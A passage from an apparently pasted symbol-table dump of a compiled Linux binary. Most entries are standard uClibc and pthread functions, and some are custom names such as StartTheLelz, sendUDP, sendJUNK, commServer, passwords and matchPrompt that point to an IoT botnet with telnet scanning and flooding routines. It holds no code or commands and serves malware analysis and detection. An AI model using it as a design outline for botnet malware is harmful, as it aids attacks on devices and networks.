  3272. system
  3273. __open_etc_hosts
  3274. __rpc_thread_svc_max_pollfd
  3275. __GI_xprt_register
  3276. __pthread_cleanup_push_defer
  3277. malloc
  3278. __udivsi3
  3279. isatty
  3280. __GI_pthread_cond_timedwait
  3281. siglongjmp
  3282. pthread_attr_getscope
  3283. __GI_pmap_unset
  3284. sleep
  3285. __GI_atol
  3286. sched_setscheduler
  3287. __new_sem_post
  3288. __pthread_initialize_manager
  3289. vsnprintf
  3290. __dns_lookup
  3291. __GI_read
  3292. recvfrom
  3293. sem_wait
  3294. xdr_bytes
  3295. svcerr_decode
  3296. tcdrain
  3297. __C_ctype_tolower
  3298. pthread_attr_getguardsize
  3299. __bss_start__
  3300. random_r
  3301. __libc_longjmp
  3302. __dso_handle
  3303. sem_post
  3304. sched_getscheduler
  3305. __new_exitfn
  3306. pthread_testcancel
  3307. __malloc_heap_lock
  3308. __pthread_manager_sighandler
  3309. __libc_pthread_init
  3310. gethostbyname_r
  3311. __pthread_attr_getstackaddr
  3312. tcpcsum
  3313. __linuxthreads_death_event
  3314. __linuxthreads_version
  3315. fdpclose
  3316. __GI_pthread_attr_destroy
  3317. socket
  3318. __GI_dup2
  3319. select
  3320. _pthread_cleanup_pop_restore
  3321. __GI_wcrtomb
  3322. __GI___libc_fcntl
  3323. __GI_memset
  3324. __GI_accept
  3325. clnt_perror
  3326. __pthread_attr_setstacksize
  3327. isspace
  3328. pthread_attr_getinheritsched
  3329. __stdio_seek
  3330. __linuxthreads_pthread_keys_max
  3331. pthread_kill_other_threads_np
  3332. mempcpy
  3333. __GI_strcoll
  3334. __GI_write
  3335. __pthread_mutexattr_gettype
  3336. xdr_void
  3337. sem_unlink
  3338. __ctype_toupper
  3339. __libc_pwrite
  3340. __libc_read
  3341. xdr_pmap
  3342. svcerr_progvers
  3343. __GI_xdr_accepted_reply
  3344. _string_syserrmsgs
  3345. svcerr_noproc
  3346. __pthread_kill_other_threads_np
  3347. __GI_open
  3348. __GI_strchr
  3349. __searchdomain
  3350. __pthread_initialize
  3351. __GI_xdr_rejected_reply
  3352. __pthread_mutexattr_setkind_np
  3353. lseek
  3354. __GI_clnt_perror
  3355. __malloc_heap
  3356. sigaddset
  3357. __linuxthreads_pthread_key_2ndlevel_size
  3358. __GI_tcgetattr
  3359. __environ
  3360. mmap
  3361. xdr_vector
  3362. __GI_clntudp_create
  3363. __pthread_alt_unlock
  3364. svc_getreq_common
  3365. wcsnrtombs
  3366. pthread_detach
  3367. makeIPPacket
  3368. sockprintf
  3369. __GI_inet_ntoa
  3370. send
  3371. svc_getreq
  3372. __fgetc_unlocked
  3373. __GI_clnt_spcreateerror
  3374. abort
  3375. nrand48_r
  3376. xprt_unregister
  3377. pthread_attr_getschedpolicy
  3378. __sigjmp_save
  3379. __libc_drand48_data
  3380. __pthread_handles
  3381. __GI_fcntl
  3382. __GI_wcsrtombs
  3383. __GI_fwrite_unlocked
  3384. __libc_tsd_RPC_VARS_data
  3385. __GI_getgid
  3386. srandom_r
  3387. __GI_fputs
  3388. xdr_char
  3389. _init
  3390. __GI_setrlimit
  3391. clnt_pcreateerror
  3392. __GI_inet_ntoa_r
  3393. __GI_setstate_r
  3394. pthread_attr_setstackaddr
  3395. parseHex
  3396. strtol
  3397. __sigsetjmp
  3398. pipe
  3399. __libc_lseek64
  3400. __GI_pthread_getschedparam
  3401. _svcauth_unix
  3402. strnlen
  3403. rawmemchr
  3404. __GI_mempcpy
  3405. accept
  3406. __libc_allocate_rtsig
  3407. pthread_getschedparam
  3408. __GI___C_ctype_b_data
  3409. __libc_pread64
  3410. __GI_xdr_replymsg
  3411. __GI_lrand48_r
  3412. __sigaddset
  3413. __GI_xdr_authunix_parms
  3414. pthread_setcancelstate
  3415. xdr_union
  3416. __pthread_functions
  3417. nanosleep
  3418. __GI_send
  3419. __pthread_wait_for_restart_signal
  3420. xdr_enum
  3421. h_errno
  3422. calloc
  3423. __GI_svcerr_auth
  3424. xdr_bool
  3425. __pthread_mutex_unlock
  3426. wait4
  3427. __GI_exit
  3428. __app_fini
  3429. setrlimit
  3430. csum
  3431. __GI_xdr_long
  3432. __exit_cleanup
  3433. _memcpy
  3434. xdr_wrapstring
  3435. xdr_rejected_reply
  3436. __GI___rpc_thread_createerr
  3437. __GI_execl
  3438. __GI_srandom_r
  3439. pthread_condattr_destroy
  3440. __GI___ctype_tolower
  3441. pthread_attr_setscope
  3442. write
  3443. __rpc_thread_variables
  3444. environ
  3445. __GI_close
  3446. xdr_free
  3447. xdr_netobj
  3448. fprintf
  3449. __resolv_lock
  3450. kill
  3451. fputs_unlocked
  3452. __pthread_mutex_trylock
  3453. __pthread_destroy_specifics
  3454. svc_register
  3455. xdr_long
  3456. pthread_mutexattr_setkind_np
  3457. __GI_svcerr_decode
  3458. __GI_brk
  3459. bind
  3460. _svcauth_short
  3461. __GI_nanosleep
  3462. __GI_strtok
  3463. __umodsi3
  3464. svcerr_systemerr
  3465. _stdio_openlist
  3466. __GI_sigprocmask
  3467. inet_addr
  3468. ntohl
  3469. __GI_fseek
  3470. __pthread_nonstandard_stacks
  3471. __GI_clntudp_bufcreate
  3472. __GI___libc_open64
  3473. pthread_cond_broadcast
  3474. pthread_once
  3475. __deregister_frame_info
  3476. __pthread_once_fork_child
  3477. ourIP
  3478. __aeabi_idiv
  3479. chdir
  3480. pthread_attr_setinheritsched
  3481. __pthread_alt_lock
  3482. pmap_unset
  3483. __pthread_manager_adjust_prio
  3484. fseeko
  3485. _stdio_openlist_del_count
  3486. connectTimeout
  3487. __pthread_manager_thread
  3488. __pthread_setconcurrency
  3489. setsockopt
  3490. xdr_short
  3491. bsd_signal
  3492. fseek
  3493. pthread_setschedparam
  3494. __GI_kill
  3495. __GI_strcmp
  3496. svc_getreqset
  3497. __GI_memmove
  3498. setstate
  3499. __decode_dotted
  3500. __GI_pthread_cond_broadcast
  3501. __pthread_perform_cleanup
  3502. __stdio_READ
  3503. pthread_key_create
  3504. memchr
  3505. __GI_toupper
  3506. __pthread_initialize_minimal
  3507. __GI_recv
  3508. svc_getreq_poll
  3509. __bss_end__
  3510. __stdin
  3511. stdin
  3512. __GI_clnt_sperrno
  3513. __new_sem_wait
  3514. wait
  3515. xdr_accepted_reply
  3516. __GI_isatty
  3517. __libc_open64
  3518. pthread_setconcurrency
  3519. sem_init
  3520. svcerr_weakauth
  3521. xdr_authunix_parms
  3522. __pthread_mutex_destroy
  3523. __pthread_mutexattr_getkind_np
  3524. __pthread_handles_num
  3525. _start
  3526. sem_close
  3527. __GI_xdr_opaque_auth
  3528. strstr
  3529. __GI_ioctl
  3530. xdr_u_longlong_t
  3531. init_rand
  3532. rand
  3533. pthread_kill
  3534. signal
  3535. read
  3536. __GI_xdr_int
  3537. __pthread_manager_request
  3538. __pthread_internal_tsd_get
  3539. __decode_header
  3540. pread64
  3541. __linuxthreads_pthread_sizeof_descr
  3542. pthread_attr_setstacksize
  3543. getCores
  3544. __GI___h_errno_location
  3545. xdr_u_char
  3546. __GI_memcpy
  3547. sendmsg
  3548. strcoll
  3549. clntudp_create
  3550. __GI_xdr_callhdr
  3551. wcsrtombs
  3552. _stdio_user_locking
  3553. __pthread_internal_tsd_address
  3554. __cmsg_nxthdr
  3555. __GI_svcerr_noprog
  3556. __GI_sigdelset
  3557. strncpy
  3558. strcasecmp
  3559. htonl
  3560. sendto
  3561. __exit_count
  3562. xdr_u_long
  3563. __C_ctype_toupper
  3564. __GI_open64
  3565. StartTheLelz
  3566. sched_get_priority_max
  3567. __GI___C_ctype_b
  3568. xdr_replymsg
  3569. pthread_sigmask
  3570. realloc
  3571. on_exit
  3572. __libc_siglongjmp
  3573. __pthread_compare_and_swap
  3574. __GI_gethostbyname_r
  3575. __GI_pthread_cond_signal
  3576. __GI_strncpy
  3577. __libc_send
  3578. __GI___xpg_strerror_r
  3579. currentServer
  3580. __pthread_attr_setstackaddr
  3581. __GI___C_ctype_tolower
  3582. __GI_recvfrom
  3583. pthread_cond_init
  3584. __GI_getrlimit
  3585. __GI_strcpy
  3586. __GI_inet_ntop
  3587. strtok
  3588. __GI___fputc_unlocked
  3589. sigfillset
  3590. memcmp
  3591. svcerr_noprog
  3592. sched_get_priority_min
  3593. __stdio_adjust_position
  3594. xdr_opaque
  3595. _vfprintf_internal
  3596. __GI_poll
  3597. __GI_nrand48_r
  3598. fork
  3599. __pthread_restart
  3600. __GI_pthread_attr_setschedpolicy
  3601. __aeabi_ldiv0
  3602. pthread_mutexattr_getpshared
  3603. __GI_pthread_attr_setinheritsched
  3604. __stdio_rfill
  3605. strncat
  3606. __GI_pthread_attr_getscope
  3607. __GI_bindresvport
  3608. gotIP
  3609. __libc_pause
  3610. sem_trywait
  3611. __GI_sleep
  3612. sigaction
  3613. _dl_phdr
  3614. __pthread_mutexattr_init
  3615. __GI_svc_sendreply
  3616. __GI_getc_unlocked
  3617. __GI___libc_fcntl64
  3618. __uClibc_init
  3619. xdr_callhdr
  3620. __GI_munmap
  3621. _store_inttype
  3622. __length_dotted
  3623. __getpagesize
  3624. __GI_random
  3625. __syscall_error
  3626. __uclibc_progname
  3627. __GI_getegid
  3628. __GI_wait4
  3629. __uClibc_main
  3630. sbrk
  3631. __rtld_fini
  3632. __GI_svcerr_progvers
  3633. __GI_fork
  3634. strdup
  3635. __libc_close
  3636. __pthread_internal_tsd_set
  3637. __GI_getpid
  3638. inet_aton
  3639. pthread_condattr_getpshared
  3640. index
  3641. _pthread_cleanup_push_defer
  3642. processCmd
  3643. __sigismember
  3644. gettimeofday
  3645. fopen
  3646. __bss_start
  3647. __GI_pthread_self
  3648. __libc_open
  3649. getOurIP
  3650. memset
  3651. __GI_socket
  3652. main
  3653. __GI___libc_lseek
  3654. __glibc_strerror_r
  3655. __GI_sigfillset
  3656. __rpc_thread_clnt_cleanup
  3657. __div0
  3658. listFork
  3659. __GI___C_ctype_tolower_data
  3660. __GI_xdr_union
  3661. __stdio_fwrite
  3662. negotiate
  3663. srand
  3664. __rpc_thread_svc_pollfd
  3665. __aeabi_uidiv
  3666. initstate
  3667. fclose
  3668. __GI_pthread_attr_setscope
  3669. __syscall_rt_sigaction
  3670. open64
  3671. xdr_string
  3672. ntohs
  3673. pthread_mutexattr_settype
  3674. sendUDP
  3675. inet_ntoa
  3676. getppid
  3677. tcgetattr
  3678. __C_ctype_tolower_data
  3679. __libc_recvfrom
  3680. time
  3681. __pthread_threads_events
  3682. __libc_system
  3683. __GI_abort
  3684. pthread_mutexattr_setpshared
  3685. poll
  3686. __end__
  3687. __GI_pthread_cond_wait
  3688. __GI_pthread_cond_init
  3689. __GI_pthread_cond_destroy
  3690. __GI_xdr_u_short
  3691. xdr_u_int
  3692. __divsi3
  3693. fdpopen
  3694. __GI_fprintf
  3695. pthread_attr_getdetachstate
  3696. __pthread_last_event
  3697. __get_hosts_byname_r
  3698. __stdio_init_mutex
  3699. __GI__exit
  3700. __libc_recvmsg
  3701. strcmp
  3702. pthread_mutex_unlock
  3703. callrpc
  3704. __default_sa_restorer
  3705. __nameserver
  3706. data_start
  3707. _seterr_reply
  3708. __rpc_thread_svc_fdset
  3709. __pthread_manager_reader
  3710. __pthread_initial_thread
  3711. __h_errno_location
  3712. __GI_putc_unlocked
  3713. __GI___rpc_thread_svc_pollfd
  3714. matchPrompt
  3715. __C_ctype_b_data
  3716. __GI_inet_pton
  3717. _stdio_fopen
  3718. __GI_xdr_u_hyper
  3719. __GI_pthread_setschedparam
  3720. _fini
  3721. __GI_xdr_opaque
  3722. __GI_chdir
  3723. authnone_create
  3724. __vfork
  3725. __GI_mmap
  3726. __malloc_sbrk_lock
  3727. __GI_xdr_array
  3728. sprintf
  3729. __pthread_offsetof_descr
  3730. __default_rt_sa_restorer
  3731. __new_sem_trywait
  3732. fdgets
  3733. msync
  3734. strerror_r
  3735. __GI_ffs
  3736. __GI_select
  3737. __libc_waitpid
  3738. __pthread_unlock
  3739. __libc_multiple_threads
  3740. sem_open
  3741. __GI_xdr_bool
  3742. __rpc_thread_destroy
  3743. __GI_waitpid
  3744. __GI_xdr_u_int
  3745. __GI_vfprintf
  3746. __GI_xdr_enum
  3747. _stdio_term
  3748. __decode_answer
  3749. __GI_signal
  3750. __pthread_attr_setguardsize
  3751. stderr
  3752. __pthread_exit_requested
  3753. commServer
  3754. __pthread_attr_getguardsize
  3755. __pthread_manager_thread_tos
  3756. __GI_pthread_exit
  3757. vfork
  3758. __C_ctype_b
  3759. __pthread_once_fork_parent
  3760. srandom
  3761. _ppfs_setargs
  3762. __GI_sendto
  3763. __GI_sigemptyset
  3764. __GI_printf
  3765. __libc_fork
  3766. sigismember
  3767. __atexit_lock
  3768. scanPid
  3769. __linuxthreads_reap_event
  3770. fsync
  3771. rand_cmwc
  3772. __pthread_manager
  3773. __libc_lseek
  3774. __GI_xprt_unregister
  3775. clnt_sperror
  3776. __GI_pmap_set
  3777. __pthread_getconcurrency
  3778. __pthread_alt_timedlock
  3779. __libc_fcntl64
  3780. _pthread_cleanup_push
  3781. pread
  3782. pthread_self
  3783. pthread_setcanceltype
  3784. getsockopt
  3785. __GI_fseeko64
  3786. __pthread_once_fork_prepare
  3787. pthread_mutexattr_init
  3788. __libc_wait
  3789. fflush_unlocked
  3790. __stdio_wcommit
  3791. __exit_slots
  3792. __GI___fgetc_unlocked
  3793. __nameservers
  3794. fwrite_unlocked
  3795. inet_ntoa_r
  3796. __pagesize
  3797. _stdio_openlist_add_lock
  3798. __aeabi_uidivmod
  3799. __GI_getdtablesize
  3800. __GI_recvmsg
  3801. __GI_pthread_attr_getschedpolicy
  3802. __drand48_iterate
  3803. _edata
  3804. __stdout
  3805. __GI_memrchr
  3806. __GI_fflush_unlocked
  3807. __GI_xdr_u_long
  3808. __GI_strstr
  3809. __searchdomains
  3810. _end
  3811. bindresvport
  3812. __pthread_threads_max
  3813. htons
  3814. pthread_mutex_destroy
  3815. svc_fdset
  3816. __rpc_thread_createerr
  3817. _sigintr
  3818. _ppfs_prepargs
  3819. __GI_strspn
  3820. fgetc_unlocked
  3821. initstate_r
  3822. pthread_mutex_lock
  3823. __GI_svc_getreq_common
  3824. __new_sem_getvalue
  3825. __GI_connect
  3826. __curbrk
  3827. sem_getvalue
  3828. __libc_poll
  3829. pthread_cond_wait
  3830. _dl_phnum
  3831. __GI_pthread_equal
  3832. _fpmaxtostr
  3833. svc_unregister
  3834. __errno_location
  3835. __pthread_timedsuspend
  3836. uppercase
  3837. __GI_pmap_getport
  3838. _stdlib_strto_l
  3839. __GI___libc_open
  3840. exit
  3841. __stdio_WRITE
  3842. _stdio_init
  3843. pthread_attr_setguardsize
  3844. __GI_geteuid
  3845. __GI_sendmsg
  3846. __modsi3
  3847. __heap_alloc
  3848. sigdelset
  3849. inet_ntop
  3850. pthread_mutex_trylock
  3851. __GI_pthread_setcancelstate
  3852. _null_auth
  3853. pthread_atfork
  3854. __C_ctype_toupper_data
  3855. _dl_aux_init
  3856. sendJUNK
  3857. __GI_perror
  3858. __libc_sendmsg
  3859. _errno
  3860. _authenticate
  3861. __GI_gettimeofday
  3862. atoi
  3863. _stdio_openlist_del_lock
  3864. pthread_cond_destroy
  3865. __GI_inet_aton
  3866. __aeabi_idiv0
  3867. pthread_attr_setschedpolicy
  3868. __GI_svc_getreq_poll
  3869. fgets_unlocked
  3870. __pthread_mutexattr_getpshared
  3871. __GI_bind
  3872. _exit
  3873. szprintf
  3874. __pthread_timedsuspend_new
  3875. __pthread_sig_cancel
  3876. __GI_xdr_void
  3877. __GI_lseek
  3878. __pthread_sig_restart
  3879. strspn
  3880. __muldi3
  3881. __pthread_offsetof_pid
  3882. __libc_recv
  3883. __pthread_main_thread
  3884. pthread_mutex_init
  3885. __pthread_cleanup_pop_restore
  3886. __libc_creat
  3887. __pthread_attr_getstacksize
  3888. strlen
  3889. __GI___cmsg_nxthdr
  3890. lseek64
  3891. open
  3892. clone
  3893. xdr_array
  3894. toupper
  3895. __libc_write
  3896. _ppfs_parsespec
  3897. __GI_strtol
  3898. __GI_getuid
  3899. __GI_strtok_r
  3900. __GI_errno
  3901. __fork
  3902. __libc_sendto
  3903. __stdio_trans2w_o
  3904. __GI_vfork
  3905. __GI__authenticate
  3906. strchr
  3907. __GI_rawmemchr
  3908. __GI_srand48_r
  3909. fputs
  3910. svc_max_pollfd
  3911. __GI_raise
  3912. pthread_attr_setschedparam
  3913. __data_start
  3914. __pthread_sizeof_handle
  3915. __pthread_provide_wrappers
  3916. setsid
  3917. __GI_inet_addr
  3918. __GI_svc_unregister
  3919. __GI_pthread_condattr_init
  3920. rpc_createerr
  3921. __libc_msync
  3922. __encode_dotted
  3923. __GI_strnlen
  3924. _Jv_RegisterClasses
  3925. macAddress
  3926. __pthread_threads_debug
  3927. pthread_attr_setdetachstate
  3928. recvmsg
  3929. fputc_unlocked
  3930. svc_pollfd
  3931. readUntil
  3932. __libc_sigsuspend
  3933. __GI_xdr_hyper
  3934. fcntl
  3935. __GI_xdr_bytes
  3936. sched_yield
  3937. pthread_join
  3938. __GI__rpc_dtablesize
  3939. __aeabi_idivmod
  3940. pthread_getconcurrency
  3941. __GI_atoi
  3942. fseeko64
  3943. pthread_cond_timedwait
  3944. __GI_sprintf
  3945. clntudp_bufcreate
  3946. __ctype_tolower
  3947. __register_frame_info
  3948. __GI_svc_getreqset
  3949. __GI_pthread_attr_getinheritsched
  3950. sigwait
  3951. wcrtomb
  3952. __GI_getsockname
  3953. __GI___rpc_thread_svc_max_pollfd
  3954. pwrite
  3955. close
  3956. __libc_connect
  3957. passwords
  3958. pthread_attr_getschedparam
  3959. srand48_r
  3960. __GI_strlen
  3961. sendHOLD
  3962. mainCommSock
  3963. pids
  3964. vfprintf
  3965. strpbrk
  3966. pthread_setspecific
  3967. xdr_int
  3968. xdr_hyper
  3969. getBogos
  3970. sigsuspend
  3971. _load_inttype
  3972. raise
  3973. clnt_sperrno
  3974. free
  3975. xdr_u_short
  3976. sigprocmask
  3977. __fputc_unlocked
  3978. __GI_authnone_create
  3979. getsockname
  3980. __GI_xdr_short
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement